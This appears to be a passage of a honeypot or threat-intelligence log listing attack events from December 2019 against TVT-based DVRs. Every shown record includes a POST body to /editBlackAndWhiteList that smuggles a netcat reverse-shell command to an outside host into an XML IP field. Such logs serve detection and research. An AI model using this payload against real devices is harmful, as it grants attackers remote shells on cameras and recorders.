- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 90,
- "first_seen": "2019-12-22T09:08:46Z",
- "last_seen": "2019-12-22T09:08:46Z"
- },
- {
- "source_ip_address": "185.104.71.19",
- "country": "LB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T08:33:28Z",
- "last_seen": "2019-12-22T08:33:28Z"
- },
- {
- "source_ip_address": "68.129.124.11",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 92,
- "first_seen": "2019-12-22T08:32:32Z",
- "last_seen": "2019-12-22T08:32:32Z"
- },
- {
- "source_ip_address": "91.196.212.78",
- "country": "PL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T07:51:35Z",
- "last_seen": "2019-12-22T07:51:35Z"
- },
- {
- "source_ip_address": "121.176.100.231",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 7,
- "first_seen": "2019-12-22T07:32:17Z",
- "last_seen": "2019-12-22T07:32:17Z"
- },
- {
- "source_ip_address": "84.33.87.10",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T06:17:28Z",
- "last_seen": "2019-12-22T06:17:28Z"
- },
- {
- "source_ip_address": "106.1.111.165",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T05:48:01Z",
- "last_seen": "2019-12-22T05:48:01Z"
- },
- {
- "source_ip_address": "122.116.90.239",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T05:45:17Z",
- "last_seen": "2019-12-22T05:45:17Z"
- },
- {
- "source_ip_address": "47.6.89.99",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T05:39:28Z",
- "last_seen": "2019-12-22T05:39:28Z"
- },
- {
- "source_ip_address": "187.202.133.235",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T05:35:43Z",
- "last_seen": "2019-12-22T05:35:43Z"
- },
- {
- "source_ip_address": "14.46.217.114",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T05:35:16Z",
- "last_seen": "2019-12-22T05:35:16Z"
- },
- {
- "source_ip_address": "95.168.77.242",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T05:35:07Z",
- "last_seen": "2019-12-22T05:35:07Z"
- },
- {
- "source_ip_address": "60.50.239.243",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 111,
- "first_seen": "2019-12-22T05:27:42Z",
- "last_seen": "2019-12-22T05:27:42Z"
- },
- {
- "source_ip_address": "145.236.40.25",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T04:46:34Z",
- "last_seen": "2019-12-22T04:46:34Z"
- },
- {
- "source_ip_address": "189.170.19.181",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 117,
- "first_seen": "2019-12-22T04:23:54Z",
- "last_seen": "2019-12-22T04:23:54Z"
- },
- {
- "source_ip_address": "189.144.40.61",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T04:07:39Z",
- "last_seen": "2019-12-22T04:07:39Z"
- },
- {
- "source_ip_address": "201.97.243.94",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T03:52:17Z",
- "last_seen": "2019-12-22T03:52:17Z"
- },
- {
- "source_ip_address": "187.137.140.107",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T03:42:39Z",
- "last_seen": "2019-12-22T03:42:39Z"
- },
- {
- "source_ip_address": "96.41.35.18",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T03:38:16Z",
- "last_seen": "2019-12-22T03:38:16Z"
- },
- {
- "source_ip_address": "200.78.207.54",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 122,
- "first_seen": "2019-12-22T03:37:31Z",
- "last_seen": "2019-12-22T03:37:31Z"
- },
- {
- "source_ip_address": "114.32.87.103",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T02:58:19Z",
- "last_seen": "2019-12-22T02:58:19Z"
- },
- {
- "source_ip_address": "93.140.85.40",
- "country": "HR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T02:40:20Z",
- "last_seen": "2019-12-22T02:40:20Z"
- },
- {
- "source_ip_address": "78.186.185.104",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T01:57:40Z",
- "last_seen": "2019-12-22T01:57:40Z"
- },
- {
- "source_ip_address": "187.137.140.107",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T01:56:51Z",
- "last_seen": "2019-12-22T01:56:51Z"
- },
- {
- "source_ip_address": "93.47.154.33",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T01:44:32Z",
- "last_seen": "2019-12-22T01:44:32Z"
- },
- {
- "source_ip_address": "62.28.99.1",
- "country": "PT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T01:27:13Z",
- "last_seen": "2019-12-22T01:27:13Z"
- },
- {
- "source_ip_address": "175.138.75.148",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T01:12:38Z",
- "last_seen": "2019-12-22T01:12:38Z"
- },
- {
- "source_ip_address": "5.11.142.27",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
